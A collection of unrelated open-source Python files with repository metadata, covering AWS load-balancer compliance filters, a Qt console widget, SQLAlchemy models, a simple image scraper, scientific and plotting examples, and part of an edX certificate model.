{'required': ['type', 'blacklist']}
],
'properties': {
'type': {'enum': ['ssl-policy']},
'matching': {'type': 'string'},
'whitelist': {'type': 'array', 'items': {'type': 'string'}},
'blacklist': {'type': 'array', 'items': {'type': 'string'}}
}
}
permissions = ("elasticloadbalancing:DescribeLoadBalancerPolicies",)
def validate(self):
if 'whitelist' in self.data and 'blacklist' in self.data:
raise FilterValidationError(
"cannot specify whitelist and black list")
if 'whitelist' not in self.data and 'blacklist' not in self.data:
raise FilterValidationError(
"must specify either policy blacklist or whitelist")
if ('blacklist' in self.data and
not isinstance(self.data['blacklist'], list)):
raise FilterValidationError("blacklist must be a list")
if 'matching' in self.data:
# Sanity check that we can compile
try:
re.compile(self.data['matching'])
except re.error as e:
raise FilterValidationError(
"Invalid regex: %s %s" % (e, self.data))
return self
def process(self, balancers, event=None):
balancers = [b for b in balancers if is_ssl(b)]
active_policy_attribute_tuples = (
self.create_elb_active_policy_attribute_tuples(balancers))
whitelist = set(self.data.get('whitelist', []))
blacklist = set(self.data.get('blacklist', []))
invalid_elbs = []
if 'matching' in self.data:
regex = self.data.get('matching')
filtered_pairs = []
for (elb, active_policies) in active_policy_attribute_tuples:
filtered_policies = [policy for policy in active_policies if
bool(re.match(regex, policy, flags=re.IGNORECASE))]
if filtered_policies:
filtered_pairs.append((elb, filtered_policies))
active_policy_attribute_tuples = filtered_pairs
if blacklist:
for elb, active_policies in active_policy_attribute_tuples:
if len(blacklist.intersection(active_policies)) > 0:
elb["ProhibitedPolicies"] = list(
blacklist.intersection(active_policies))
invalid_elbs.append(elb)
elif whitelist:
for elb, active_policies in active_policy_attribute_tuples:
if len(set(active_policies).difference(whitelist)) > 0:
elb["ProhibitedPolicies"] = list(
set(active_policies).difference(whitelist))
invalid_elbs.append(elb)
return invalid_elbs
def create_elb_active_policy_attribute_tuples(self, elbs):
"""
Returns a list of tuples of active SSL policies attributes
for each elb [(elb['Protocol-SSLv1','Protocol-SSLv2',...])]
"""
elb_custom_policy_tuples = self.create_elb_custom_policy_tuples(elbs)
active_policy_attribute_tuples = (
self.create_elb_active_attributes_tuples(elb_custom_policy_tuples))
return active_policy_attribute_tuples
def create_elb_custom_policy_tuples(self, balancers):
"""
creates a list of tuples (elb,[sslpolicy1,sslpolicy2...])
for all custom policies on the ELB
"""
elb_policy_tuples = []
for b in balancers:
policies = []
for ld in b['ListenerDescriptions']:
for p in ld['PolicyNames']:
policies.append(p)
elb_policy_tuples.append((b, policies))
return elb_policy_tuples
def create_elb_active_attributes_tuples(self, elb_policy_tuples):
"""
creates a list of tuples for all attributes that are marked
as "true" in the load balancer's polices, e.g.
(myelb,['Protocol-SSLv1','Protocol-SSLv2'])
"""
active_policy_attribute_tuples = []
with self.executor_factory(max_workers=2) as w:
futures = []
for elb_policy_set in chunks(elb_policy_tuples, 50):
futures.append(
w.submit(self.process_elb_policy_set, elb_policy_set))
for f in as_completed(futures):
if f.exception():
self.log.error(
"Exception processing elb policies \n %s" % (
f.exception()))
continue
for elb_policies in f.result():
active_policy_attribute_tuples.append(elb_policies)
return active_policy_attribute_tuples
@worker
def process_elb_policy_set(self, elb_policy_set):
results = []
client = local_session(self.manager.session_factory).client('elb')
for (elb, policy_names) in elb_policy_set:
elb_name = elb['LoadBalancerName']
try:
policies = client.describe_load_balancer_policies(
LoadBalancerName=elb_name,
PolicyNames=policy_names)['PolicyDescriptions']
except ClientError as e:
if e.response['Error']['Code'] in [
'LoadBalancerNotFound', 'PolicyNotFound']:
continue
raise
active_lb_policies = []
ssl_policies = []
for p in policies:
if p['PolicyTypeName'] != 'SSLNegotiationPolicyType':
continue
ssl_policies.append(p['PolicyName'])
active_lb_policies.extend(
[policy_description['AttributeName']
for policy_description in
p['PolicyAttributeDescriptions']
if policy_description['AttributeValue'] == 'true']
)
elb['c7n.ssl-policies'] = ssl_policies
results.append((elb, active_lb_policies))
return results
@filters.register('healthcheck-protocol-mismatch')
class HealthCheckProtocolMismatch(Filter):
"""Filters ELB that have a healtch check protocol mismatch
The mismatch occurs if the ELB has a different protocol to check than
the associated instances allow to determine health status.
:example:
.. code-block:: yaml
policies:
- name: elb-healthcheck-mismatch
resource: elb
filters:
- type: healthcheck-protocol-mismatch
"""
schema = type_schema('healthcheck-protocol-mismatch')
def __call__(self, load_balancer):
health_check_protocol = (
load_balancer['HealthCheck']['Target'].split(':')[0])
listener_descriptions = load_balancer['ListenerDescriptions']
if len(listener_descriptions) == 0:
return True
# check if any of the protocols in the ELB match the health
# check. There is only 1 health check, so if there are
# multiple listeners, we only check if at least one of them
# matches
protocols = [listener['Listener']['InstanceProtocol']
for listener in listener_descriptions]
return health_check_protocol in protocols
@filters.register('default-vpc')
class DefaultVpc(DefaultVpcBase):
""" Matches if an elb database is in the default vpc
:example:
.. code-block:: yaml
policies:
- name: elb-default-vpc
resource: elb
filters:
- type: default-vpc
"""
schema = type_schema('default-vpc')
def __call__(self, elb):
return elb.get('VPCId') and self.match(elb.get('VPCId')) or False
class ELBAttributeFilterBase(object):
""" Mixin base class for filters that query LB attributes.
"""
def initialize(self, elbs):
def _process_attributes(elb):
if 'Attributes' not in elb:
client = local_session(
self.manager.session_factory).client('elb')
results = client.describe_load_balancer_attributes(
LoadBalancerName=elb['LoadBalancerName'])
elb['Attributes'] = results['LoadBalancerAttributes']
with self.manager.executor_factory(max_workers=2) as w:
list(w.map(_process_attributes, elbs))
@filters.register('is-logging')
class IsLoggingFilter(Filter, ELBAttributeFilterBase):
"""Matches ELBs that are logging to S3.
bucket and prefix are optional
:example:
.. code-block:: yaml
policies:
- name: elb-is-logging-test
resource: elb
filters:
- type: is-logging
- name: elb-is-logging-bucket-and-prefix-test
resource: elb
filters:
- type: is-logging
bucket: prodlogs
prefix: elblogs
"""
permissions = ("elasticloadbalancing:DescribeLoadBalancerAttributes",)
schema = type_schema('is-logging',
bucket={'type': 'string'},
prefix={'type': 'string'}
)
def process(self, resources, event=None):
self.initialize(resources)
bucket_name = self.data.get('bucket', None)
bucket_prefix = self.data.get('prefix', None)
return [elb for elb in resources
if elb['Attributes']['AccessLog']['Enabled'] and
(not bucket_name or bucket_name == elb['Attributes'][
'AccessLog'].get('S3BucketName', None)) and
(not bucket_prefix or bucket_prefix == elb['Attributes'][
'AccessLog'].get('S3BucketPrefix', None))
]
@filters.register('is-not-logging')
class IsNotLoggingFilter(Filter, ELBAttributeFilterBase):
""" Matches ELBs that are NOT logging to S3.
or do not match the optional bucket and/or prefix.
:example:
.. code-block:: yaml
policies:
- name: elb-is-not-logging-test
resource: elb
filters:
- type: is-not-logging
- name: is-not-logging-bucket-and-prefix-test
resource: app-elb
filters:
- type: is-not-logging
bucket: prodlogs
prefix: alblogs
"""
permissions = ("elasticloadbalancing:DescribeLoadBalancerAttributes",)
schema = type_schema('is-not-logging',
bucket={'type': 'string'},
prefix={'type': 'string'}
)
def process(self, resources, event=None):
self.initialize(resources)
bucket_name = self.data.get('bucket', None)
bucket_prefix = self.data.get('prefix', None)
return [elb for elb in resources
if not elb['Attributes']['AccessLog']['Enabled'] or
(bucket_name and bucket_name != elb['Attributes'][
'AccessLog'].get(
'S3BucketName', None)) or
(bucket_prefix and bucket_prefix != elb['Attributes'][
'AccessLog'].get(
'S3AccessPrefix', None))
]
|
scotwk/cloud-custodian
|
c7n/resources/elb.py
|
Python
|
apache-2.0
| 29,736 | 0.000303 |
#! /usr/bin/python
# -*- coding: utf-8 -*-
"""
Created on Fri Jan 27 18:31:59 2017
@author: katsuya.ishiyama
"""
from numpy import random
# Definition of module level constants
SUCCESS_CODE = 1
FAILURE_CODE = 0
class Strategy():
def __init__(self, n):
_success_probability = _generate_success_probability(n)
_strategy = {i: p for i, p in enumerate(_success_probability, 1)}
self._n = n
self.strategy = _strategy
self.stock_of_strategy = list(_strategy.keys())
self.tried_strategy = []
self.current_strategy = None
self.previous_strategy = None
self.count_same_strategy = 0
self._result_of_trial = None
def choose_strategy(self):
if not self.stock_of_strategy:
raise ValueError('There is no strategy in stock.')
_chosen_id = random.choice(self.stock_of_strategy, 1)[0]
self.previous_strategy = self.current_strategy
self.current_strategy = _chosen_id
self.count_same_strategy = 0
self.stock_of_strategy.remove(_chosen_id)
_chosen_strategy = {
'chosen_strategy': _chosen_id,
'success_probability': self._get_success_probability()
}
return _chosen_strategy
def _get_success_probability(self):
return self.strategy[self.current_strategy]
def try_strategy(self):
if not self.current_strategy:
raise ValueError('No strategy is chosen.')
self.tried_strategy.append(self.current_strategy)
self._result_of_trial = _get_trial_result(
p=self._get_success_probability()
)
if self.current_strategy == self.previous_strategy:
self.count_same_strategy += 1
return self._result_of_trial
def _get_trial_result(p):
_trial_result = random.choice([FAILURE_CODE, SUCCESS_CODE], size=1, p=[1 - p, p])
return _trial_result[0]
def _generate_success_probability(size):
return random.sample(size)
|
Katsuya-Ishiyama/simulation
|
strategy/strategy.py
|
Python
|
mit
| 2,013 | 0.00149 |
import urllib2
from HTMLParser import HTMLParser
from traceback import print_exc
from sys import stderr
class _DeHTMLParser(HTMLParser):
'''
利用HTMLParse来解析网页元素
'''
def __init__(self):
HTMLParser.__init__(self)
self.img_links = []
def handle_starttag(self, tag, attrs):
if tag == 'img':
# print(attrs)
try:
if ('pic_type','0') in attrs:
for name, value in attrs:
if name == 'src':
self.img_links.append(value)
except Exception as e:
print(e)
return self.img_links
def dehtml(text):
try:
parser = _DeHTMLParser()
parser.feed(text)
parser.close()
return parser.img_links
except:
print_exc(file=stderr)
return text
def main():
html = urllib2.urlopen('http://tieba.baidu.com/p/2166231880')
content = html.read()
print(dehtml(content))
i = 0
for img_list in dehtml(content):
img_content = urllib2.urlopen(img_list).read()
path_name = str(i)+'.jpg'
with open(path_name,'wb') as f:
f.write(img_content)
i+=1
if __name__ == '__main__':
main()
|
luoxufeiyan/python
|
burness/0013/get_photos.py
|
Python
|
mit
| 1,039 | 0.043095 |
#!/usr/bin/env python2
""" This is the main module, used to launch the persistency engine """
#from persio import iohandler
import persui.persinterface as ui
def main():
""" Launches the user interface, and keeps it on."""
interface = ui.Persinterface()
while True:
interface.run()
if __name__ == '__main__':
main()
"""
def main_old():
keynames = ["A", "B"]
graph_data1 = [(0, 0, 0, 1), (0, 1, 2, 3)]
graph_data2 = [(2, 3, 0, 1), (0, 6, 2, 8)]
graph_data = [graph_data1, graph_data2]
name = "tree.xml"
root = iohandler.xh.createindex(keynames)
for i in xrange(2):
iohandler.xh.creategraph(root, graph_data[i], keynames[i], 2)
iohandler.xh.writexml(root, name)
"""
|
jepio/pers_engine
|
persengine.py
|
Python
|
gpl-2.0
| 733 | 0.002729 |
# -*- coding: utf-8 -*-
#
# test_get_sp_status.py
#
# This file is part of NEST.
#
# Copyright (C) 2004 The NEST Initiative
#
# NEST is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# NEST is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with NEST. If not, see <http://www.gnu.org/licenses/>.
"""
Structural Plasticity GetStatus Test
-----------------------
This tests the functionality of the GetStructuralPlasticityStatus
function
"""
import nest
import unittest
__author__ = 'sdiaz'
class TestGetStructuralPlasticityStatus(unittest.TestCase):
neuron_model = 'iaf_psc_alpha'
nest.CopyModel('static_synapse', 'synapse_ex')
nest.SetDefaults('synapse_ex', {'weight': 1.0, 'delay': 1.0})
nest.SetStructuralPlasticityStatus({
'structural_plasticity_synapses': {
'synapse_ex': {
'model': 'synapse_ex',
'post_synaptic_element': 'Den_ex',
'pre_synaptic_element': 'Axon_ex',
},
}
})
growth_curve = {
'growth_curve': "gaussian",
'growth_rate': 0.0001, # (elements/ms)
'continuous': False,
'eta': 0.0, # Ca2+
'eps': 0.05
}
'''
Now we assign the growth curves to the corresponding synaptic
elements
'''
synaptic_elements = {
'Den_ex': growth_curve,
'Den_in': growth_curve,
'Axon_ex': growth_curve,
}
nodes = nest.Create(neuron_model,
2,
{'synaptic_elements': synaptic_elements}
)
all = nest.GetStructuralPlasticityStatus()
print(all)
assert ('structural_plasticity_synapses' in all)
assert ('syn1' in all['structural_plasticity_synapses'])
assert ('structural_plasticity_update_interval' in all)
assert (all['structural_plasticity_update_interval'] == 1000)
sp_synapses = nest.GetStructuralPlasticityStatus(
'structural_plasticity_synapses'
)
print(sp_synapses)
syn = sp_synapses['syn1']
assert ('pre_synaptic_element' in syn)
assert ('post_synaptic_element' in syn)
assert (syn['pre_synaptic_element'] == 'Axon_ex')
assert (syn['post_synaptic_element'] == 'Den_ex')
sp_interval = nest.GetStructuralPlasticityStatus(
'structural_plasticity_update_interval'
)
print(sp_interval)
assert (sp_interval == 1000)
def suite():
test_suite = unittest.makeSuite(
TestGetStructuralPlasticityStatus,
'test'
)
return test_suite
if __name__ == '__main__':
unittest.main()
|
hakonsbm/nest-simulator
|
pynest/nest/tests/test_sp/test_get_sp_status.py
|
Python
|
gpl-2.0
| 3,006 | 0 |
from filer.apps import FilerConfig
class MyFilerConfig(FilerConfig):
verbose_name = "Dateiverwaltung"
|
n2o/dpb
|
dpb/apps.py
|
Python
|
mit
| 108 | 0 |
# Copyright (c) 2015 Aaron Kehrer
# Licensed under the terms of the MIT License
# (see fiddle/__init__.py for details)
import os
import unicodedata
from io import StringIO
from PyQt4 import QtCore, QtGui
from fiddle.config import EDITOR_FONT, EDITOR_FONT_SIZE
class PyConsoleTextBrowser(QtGui.QTextBrowser):
def __init__(self, parent=None, process=None):
super(PyConsoleTextBrowser, self).__init__(parent)
self.process = process
# The start position in the QTextBrowser document where new user input will be inserted
self._input_insert_pos = -1
self.history = []
self.history_idx = 0
self.setLineWrapMode(QtGui.QTextEdit.NoWrap)
self.setAcceptRichText(False)
self.setReadOnly(False)
self.setOpenExternalLinks(False)
self.setOpenLinks(False)
self.setTextInteractionFlags(QtCore.Qt.LinksAccessibleByMouse | QtCore.Qt.TextEditorInteraction)
def keyPressEvent(self, event):
if self.process is not None:
# Skip keys modified with Ctrl or Alt
if event.modifiers() != QtCore.Qt.ControlModifier and event.modifiers() != QtCore.Qt.AltModifier:
# Get the insert cursor and make sure it's at the end of the console
cursor = self.textCursor()
cursor.movePosition(QtGui.QTextCursor.End)
if self._input_insert_pos < 0:
self._input_insert_pos = cursor.position()
# Scroll view to end of console
self.setTextCursor(cursor)
self.ensureCursorVisible()
# Process the key event
if event.key() == QtCore.Qt.Key_Up:
# Clear any previous input
self._clear_insert_line(cursor)
# Get the history
if len(self.history) > 0:
self.history_idx -= 1
try:
cursor.insertText(self.history[self.history_idx])
except IndexError:
self.history_idx += 1
cursor.insertText('')
elif event.key() == QtCore.Qt.Key_Down:
# Clear any previous input
self._clear_insert_line(cursor)
# Get the history
if len(self.history) > 0 >= self.history_idx:
self.history_idx += 1
try:
cursor.insertText(self.history[self.history_idx])
except IndexError:
self.history_idx -= 1
cursor.insertText('')
elif event.key() == QtCore.Qt.Key_Return:
txt = self._select_insert_line(cursor)
self.process.write('{0}\n'.format(txt).encode('utf-8'))
# Reset the insert position
self._input_insert_pos = -1
# Update the history
self.history.append(txt)
self.history_idx = 0
# Pass the event on to the parent for handling
return QtGui.QTextBrowser.keyPressEvent(self, event)
def _clear_insert_line(self, cursor):
"""
Remove all the displayed text from the input insert line and clear the input buffer
"""
cursor.setPosition(self._input_insert_pos, QtGui.QTextCursor.KeepAnchor)
cursor.removeSelectedText()
def _select_insert_line(self, cursor):
cursor.setPosition(self._input_insert_pos, QtGui.QTextCursor.KeepAnchor)
txt = cursor.selectedText()
cursor.clearSelection()
return txt
class PyConsoleLineEdit(QtGui.QLineEdit):
"""
https://wiki.python.org/moin/PyQt/Adding%20tab-completion%20to%20a%20QLineEdit
http://www.saltycrane.com/blog/2008/01/how-to-capture-tab-key-press-event-with/
"""
def __init__(self):
super(PyConsoleLineEdit, self).__init__()
line_font = QtGui.QFont()
line_font.setFamily(EDITOR_FONT)
line_font.setPointSize(EDITOR_FONT_SIZE)
self.setFont(line_font)
self.history = []
self.history_idx = -1
def event(self, event):
if event.type() == QtCore.QEvent.KeyPress:
if event.key() == QtCore.Qt.Key_Tab:
if self.text().strip() == '':
self.setText(self.text() + ' ')
return True
elif event.key() == QtCore.Qt.Key_Up:
if len(self.history) > 0 and self.history_idx > 0:
self.history_idx -= 1
self.setText(self.history[self.history_idx])
return True
elif event.key() == QtCore.Qt.Key_Down:
if 0 < len(self.history) > self.history_idx:
self.history_idx += 1
try:
self.setText(self.history[self.history_idx])
except IndexError:
self.setText('')
return True
elif event.key() == QtCore.Qt.Key_Return:
try:
if self.history[-1] != self.text():
self.history.append(self.text())
except IndexError:
self.history.append(self.text())
self.history_idx = len(self.history)
return QtGui.QLineEdit.event(self, event)
return QtGui.QLineEdit.event(self, event)
|
akehrer/fiddle
|
fiddle/controllers/PyConsole.py
|
Python
|
gpl-3.0
| 5,579 | 0.001255 |
# Copyright (c) 2011 X.commerce, a business unit of eBay Inc.
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# Copyright 2011 Piston Cloud Computing, Inc.
# Copyright 2012 Cloudscaling Group, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
SQLAlchemy models.
"""
import six
from sqlalchemy import Column, Integer
from sqlalchemy import DateTime
from sqlalchemy.orm import object_mapper
from solum.openstack.common.db.sqlalchemy import session as sa
from solum.openstack.common import timeutils
class ModelBase(object):
"""Base class for models."""
__table_initialized__ = False
def save(self, session=None):
"""Save this object."""
if not session:
session = sa.get_session()
# NOTE(boris-42): This part of code should be look like:
# session.add(self)
# session.flush()
# But there is a bug in sqlalchemy and eventlet that
# raises NoneType exception if there is no running
# transaction and rollback is called. As long as
# sqlalchemy has this bug we have to create transaction
# explicitly.
with session.begin(subtransactions=True):
session.add(self)
session.flush()
def __setitem__(self, key, value):
setattr(self, key, value)
def __getitem__(self, key):
return getattr(self, key)
def get(self, key, default=None):
return getattr(self, key, default)
@property
def _extra_keys(self):
"""Specifies custom fields
Subclasses can override this property to return a list
of custom fields that should be included in their dict
representation.
For reference check tests/db/sqlalchemy/test_models.py
"""
return []
def __iter__(self):
columns = dict(object_mapper(self).columns).keys()
# NOTE(russellb): Allow models to specify other keys that can be looked
# up, beyond the actual db columns. An example would be the 'name'
# property for an Instance.
columns.extend(self._extra_keys)
self._i = iter(columns)
return self
def next(self):
n = six.advance_iterator(self._i)
return n, getattr(self, n)
def update(self, values):
"""Make the model object behave like a dict."""
for k, v in six.iteritems(values):
setattr(self, k, v)
def iteritems(self):
"""Make the model object behave like a dict.
Includes attributes from joins.
"""
local = dict(self)
joined = dict([(k, v) for k, v in six.iteritems(self.__dict__)
if not k[0] == '_'])
local.update(joined)
return six.iteritems(local)
class TimestampMixin(object):
created_at = Column(DateTime, default=lambda: timeutils.utcnow())
updated_at = Column(DateTime, onupdate=lambda: timeutils.utcnow())
class SoftDeleteMixin(object):
deleted_at = Column(DateTime)
deleted = Column(Integer, default=0)
def soft_delete(self, session=None):
"""Mark this object as deleted."""
self.deleted = self.id
self.deleted_at = timeutils.utcnow()
self.save(session=session)
|
alex/solum
|
solum/openstack/common/db/sqlalchemy/models.py
|
Python
|
apache-2.0
| 3,969 | 0 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (C) 2018 David Arroyo Menéndez
# Author: David Arroyo Menéndez <davidam@gnu.org>
# Maintainer: David Arroyo Menéndez <davidam@gnu.org>
# This file is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
# This file is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with GNU Emacs; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor,
# Boston, MA 02110-1301 USA,
from bokeh.plotting import figure, show, output_file
from bokeh.tile_providers import CARTODBPOSITRON
output_file("tile.html")
# range bounds supplied in web mercator coordinates
p = figure(x_range=(-2000000, 6000000), y_range=(-1000000, 7000000),
x_axis_type="mercator", y_axis_type="mercator")
p.add_tile(CARTODBPOSITRON)
show(p)
|
davidam/python-examples
|
bokeh/openstreetmap.py
|
Python
|
gpl-3.0
| 1,245 | 0 |
#!/usr/bin/env python
# coding=utf-8
from toughlogger.common import pyforms
from toughlogger.common.pyforms import rules
from toughlogger.common.pyforms.rules import button_style, input_style
password_update_form = pyforms.Form(
pyforms.Textbox("tra_user", description=u"管理员名", size=32, readonly="readonly", **input_style),
pyforms.Password("tra_user_pass", rules.len_of(6, 32), description=u"管理员新密码", size=32,value="", required="required", **input_style),
pyforms.Password("tra_user_pass_chk", rules.len_of(6, 32), description=u"确认管理员新密码", size=32,value="", required="required", **input_style),
pyforms.Button("submit", type="submit", html=u"<b>更新</b>", **button_style),
title=u"管理密码更新",
action="/password"
)
|
talkincode/toughlogger
|
toughlogger/console/handlers/password_forms.py
|
Python
|
agpl-3.0
| 789 | 0.006784 |
# -*- coding: utf-8 -*-
"""
Certificates are created for a student and an offering of a course.
When a certificate is generated, a unique ID is generated so that
the certificate can be verified later. The ID is a UUID4, so that
it can't be easily guessed and so that it is unique.
Certificates are generated in batches by a cron job, when a
certificate is available for download the GeneratedCertificate
table is updated with information that will be displayed
on the course overview page.
State diagram:
[deleted,error,unavailable] [error,downloadable]
+ + +
| | |
| | |
add_cert regen_cert del_cert
| | |
v v v
[generating] [regenerating] [deleting]
+ + +
| | |
certificate certificate certificate
created removed,created deleted
+----------------+-------------+------->[error]
| | |
| | |
v v v
[downloadable] [downloadable] [deleted]
Eligibility:
Students are eligible for a certificate if they pass the course
with the following exceptions:
If the student has allow_certificate set to False in the student profile
he will never be issued a certificate.
If the user and course is present in the certificate whitelist table
then the student will be issued a certificate regardless of his grade,
unless he has allow_certificate set to False.
"""
from datetime import datetime
import uuid
from django.contrib.auth.models import User
from django.db import models, transaction
from django.db.models.signals import post_save
from django.dispatch import receiver
from django.conf import settings
from django.utils.translation import ugettext_lazy
from model_utils import Choices
from model_utils.models import TimeStampedModel
from config_models.models import ConfigurationModel
from xmodule_django.models import CourseKeyField, NoneToEmptyManager
from util.milestones_helpers import fulfill_course_milestone
from course_modes.models import CourseMode
class CertificateStatuses(object):
deleted = 'deleted'
deleting = 'deleting'
downloadable = 'downloadable'
error = 'error'
generating = 'generating'
notpassing = 'notpassing'
regenerating = 'regenerating'
restricted = 'restricted'
unavailable = 'unavailable'
class CertificateWhitelist(models.Model):
"""
Tracks students who are whitelisted, all users
in this table will always qualify for a certificate
regardless of their grade unless they are on the
embargoed country restriction list
(allow_certificate set to False in userprofile).
"""
objects = NoneToEmptyManager()
user = models.ForeignKey(User)
course_id = CourseKeyField(max_length=255, blank=True, default=None)
whitelist = models.BooleanField(default=0)
class GeneratedCertificate(models.Model):
MODES = Choices('verified', 'honor', 'audit')
user = models.ForeignKey(User)
course_id = CourseKeyField(max_length=255, blank=True, default=None)
verify_uuid = models.CharField(max_length=32, blank=True, default='')
download_uuid = models.CharField(max_length=32, blank=True, default='')
download_url = models.CharField(max_length=128, blank=True, default='')
grade = models.CharField(max_length=5, blank=True, default='')
key = models.CharField(max_length=32, blank=True, default='')
distinction = models.BooleanField(default=False)
status = models.CharField(max_length=32, default='unavailable')
mode = models.CharField(max_length=32, choices=MODES, default=MODES.honor)
name = models.CharField(blank=True, max_length=255)
created_date = models.DateTimeField(
auto_now_add=True, default=datetime.now)
modified_date = models.DateTimeField(
auto_now=True, default=datetime.now)
error_reason = models.CharField(max_length=512, blank=True, default='')
class Meta:
unique_together = (('user', 'course_id'),)
@classmethod
def certificate_for_student(cls, student, course_id):
"""
This returns the certificate for a student for a particular course
or None if no such certificate exits.
"""
try:
return cls.objects.get(user=student, course_id=course_id)
except cls.DoesNotExist:
pass
return None
@receiver(post_save, sender=GeneratedCertificate)
def handle_post_cert_generated(sender, instance, **kwargs): # pylint: disable=no-self-argument, unused-argument
"""
Handles post_save signal of GeneratedCertificate, and mark user collected
course milestone entry if user has passed the course
or certificate status is 'generating'.
"""
if settings.FEATURES.get('ENABLE_PREREQUISITE_COURSES') and instance.status == CertificateStatuses.generating:
fulfill_course_milestone(instance.course_id, instance.user)
def certificate_status_for_student(student, course_id):
'''
This returns a dictionary with a key for status, and other information.
The status is one of the following:
unavailable - No entry for this student--if they are actually in
the course, they probably have not been graded for
certificate generation yet.
generating - A request has been made to generate a certificate,
but it has not been generated yet.
regenerating - A request has been made to regenerate a certificate,
but it has not been generated yet.
deleting - A request has been made to delete a certificate.
deleted - The certificate has been deleted.
downloadable - The certificate is available for download.
notpassing - The student was graded but is not passing
restricted - The student is on the restricted embargo list and
should not be issued a certificate. This will
be set if allow_certificate is set to False in
the userprofile table
If the status is "downloadable", the dictionary also contains
"download_url".
If the student has been graded, the dictionary also contains their
grade for the course with the key "grade".
'''
try:
generated_certificate = GeneratedCertificate.objects.get(
user=student, course_id=course_id)
d = {'status': generated_certificate.status,
'mode': generated_certificate.mode}
if generated_certificate.grade:
d['grade'] = generated_certificate.grade
if generated_certificate.status == CertificateStatuses.downloadable:
d['download_url'] = generated_certificate.download_url
return d
except GeneratedCertificate.DoesNotExist:
pass
return {'status': CertificateStatuses.unavailable, 'mode': GeneratedCertificate.MODES.honor}
class ExampleCertificateSet(TimeStampedModel):
"""A set of example certificates.
Example certificates are used to verify that certificate
generation is working for a particular course.
A particular course may have several kinds of certificates
(e.g. honor and verified), in which case we generate
multiple example certificates for the course.
"""
course_key = CourseKeyField(max_length=255, db_index=True)
class Meta: # pylint: disable=missing-docstring, old-style-class
get_latest_by = 'created'
@classmethod
@transaction.commit_on_success
def create_example_set(cls, course_key):
"""Create a set of example certificates for a course.
Arguments:
course_key (CourseKey)
Returns:
ExampleCertificateSet
"""
cert_set = cls.objects.create(course_key=course_key)
ExampleCertificate.objects.bulk_create([
ExampleCertificate(
example_cert_set=cert_set,
description=mode.slug,
template=cls._template_for_mode(mode.slug, course_key)
)
for mode in CourseMode.modes_for_course(course_key)
])
return cert_set
@classmethod
def latest_status(cls, course_key):
"""Summarize the latest status of example certificates for a course.
Arguments:
course_key (CourseKey)
Returns:
list: List of status dictionaries. If no example certificates
have been started yet, returns None.
"""
try:
latest = cls.objects.filter(course_key=course_key).latest()
except cls.DoesNotExist:
return None
queryset = ExampleCertificate.objects.filter(example_cert_set=latest).order_by('-created')
return [cert.status_dict for cert in queryset]
def __iter__(self):
"""Iterate through example certificates in the set.
Yields:
ExampleCertificate
"""
queryset = (ExampleCertificate.objects).select_related('example_cert_set').filter(example_cert_set=self)
for cert in queryset:
yield cert
@staticmethod
def _template_for_mode(mode_slug, course_key):
"""Calculate the template PDF based on the course mode. """
return (
u"certificate-template-{key.org}-{key.course}-verified.pdf".format(key=course_key)
if mode_slug == 'verified'
else u"certificate-template-{key.org}-{key.course}.pdf".format(key=course_key)
)
def _make_uuid():
"""Return a 32-character UUID. """
return uuid.uuid4().hex
class ExampleCertificate(TimeStampedModel):
"""Example certificate.
Example certificates are used to verify that certificate
generation is working for a particular course.
An example certificate is similar to an ordinary certificate,
except that:
1) Example certificates are not associated with a particular user,
and are never displayed to students.
2) We store the "inputs" for generating the example certificate
to make it easier to debug when certificate generation fails.
3) We use dummy values.
"""
# Statuses
STATUS_STARTED = 'started'
STATUS_SUCCESS = 'success'
STATUS_ERROR = 'error'
# Dummy full name for the generated certificate
EXAMPLE_FULL_NAME = u'John Doë'
example_cert_set = models.ForeignKey(ExampleCertificateSet)
description = models.CharField(
max_length=255,
help_text=ugettext_lazy(
u"A human-readable description of the example certificate. "
u"For example, 'verified' or 'honor' to differentiate between "
u"two types of certificates."
)
)
# Inputs to certificate generation
# We store this for auditing purposes if certificate
# generation fails.
uuid = models.CharField(
max_length=255,
default=_make_uuid,
db_index=True,
unique=True,
help_text=ugettext_lazy(
u"A unique identifier for the example certificate. "
u"This is used when we receive a response from the queue "
u"to determine which example certificate was processed."
)
)
access_key = models.CharField(
max_length=255,
default=_make_uuid,
db_index=True,
help_text=ugettext_lazy(
u"An access key for the example certificate. "
u"This is used when we receive a response from the queue "
u"to validate that the sender is the same entity we asked "
u"to generate the certificate."
)
)
full_name = models.CharField(
max_length=255,
default=EXAMPLE_FULL_NAME,
help_text=ugettext_lazy(u"The full name that will appear on the certificate.")
)
template = models.CharField(
max_length=255,
help_text=ugettext_lazy(u"The template file to use when generating the certificate.")
)
# Outputs from certificate generation
status = models.CharField(
max_length=255,
default=STATUS_STARTED,
choices=(
(STATUS_STARTED, 'Started'),
(STATUS_SUCCESS, 'Success'),
(STATUS_ERROR, 'Error')
),
help_text=ugettext_lazy(u"The status of the example certificate.")
)
error_reason = models.TextField(
null=True,
default=None,
help_text=ugettext_lazy(u"The reason an error occurred during certificate generation.")
)
download_url = models.CharField(
max_length=255,
null=True,
default=None,
help_text=ugettext_lazy(u"The download URL for the generated certificate.")
)
def update_status(self, status, error_reason=None, download_url=None):
"""Update the status of the example certificate.
This will usually be called either:
1) When an error occurs adding the certificate to the queue.
2) When we receieve a response from the queue (either error or success).
If an error occurs, we store the error message;
if certificate generation is successful, we store the URL
